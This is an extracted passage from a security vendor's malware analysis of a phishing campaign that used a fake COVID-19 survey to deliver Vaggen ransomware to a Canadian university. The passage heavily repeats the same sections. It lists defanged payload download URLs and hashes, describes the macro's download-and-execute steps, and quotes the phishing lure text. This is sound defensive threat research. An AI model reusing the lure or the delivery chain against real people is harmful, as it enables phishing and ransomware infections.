-\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1053 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1054 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1055 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1056 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1057 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1058 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1059 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1060 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1061 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1062 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1063 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1064 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1065 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1066 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1067 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1068 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1069 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1070 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1071 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1072 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1073 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1074 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1075 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1076 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1077 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1078 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1079 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1080 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1081 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1082 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1083 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1084 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1085 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those 